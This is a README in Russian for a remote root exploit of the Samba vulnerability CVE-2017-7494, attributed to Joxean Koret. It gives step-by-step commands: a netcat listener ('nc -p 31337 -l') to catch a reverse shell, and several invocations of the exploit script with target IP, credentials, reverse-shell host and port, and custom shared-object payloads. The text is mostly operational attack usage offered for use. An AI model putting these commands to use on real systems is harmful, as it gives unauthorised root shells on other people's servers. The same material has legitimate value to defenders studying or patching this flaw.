
Удалённый root-эксплойт для уязвимости SAMBA CVE-2017-7494.
Этот эксплойт состоит из двух частей:
Пока цель уязвима, а полезная нагрузка соответствует операционной системе и архитектуре цели, эксплойт работает со 100% надёжностью.
На вашей машине выполните следующую команду:
$ nc -p 31337 -l
Затем запустите эксплойт против вашей цели и дожидайтесь, пока он подключится обратно к вашему Netcat:
$ python cve_2017_7494.py -t target_ip
Если вы закроете reverse shell слишком быстро, то вместо повторного запуска эксплойта с загрузкой модуля и т. д. вы можете просто указать путь к модулю, который он уже загрузил. Предположим, он был загружен в /shared/directory/ под именем "module.so", тогда вы выполните команду вроде следующей:
$ python cve_2017_7494.py -t target_ip -m /shared/directory/module.so
Теперь вы можете снова использовать эксплойт для samba 3.5.0 и 3.6.0 — просто добавьте аргумент -o 1
python cve_2017_7494.py -t target_ip -u test -P 123456 --rhost shell_ip --rport shell_port -o 1
Теперь вы можете использовать собственный .so
python cve_2017_7494.py -t target_ip -u test -P 123456 -o 1 --custom myso.so
Если вам нужно запустить этот скрипт с x86-машины, компиляция бинарных файлов implant создаст два x86-файла. С помощью флага -n 1 вы можете отключить компиляцию и скопировать libimplantx64.so с другой машины.
python cve_2017_7494.py -t target_ip -u test -P 123456 --rhost shell_ip --rport shell_port -n 1
Если samba работает только на порту 139, вы можете задать порт удалённого сервера с помощью аргумента -p
python cve_2017_7494.py -t target_ip -p 139 -u test -P 123456 --rhost shell_ip --rport shell_port -n 1
Я больше не поддерживаю его.
-- Joxean Koret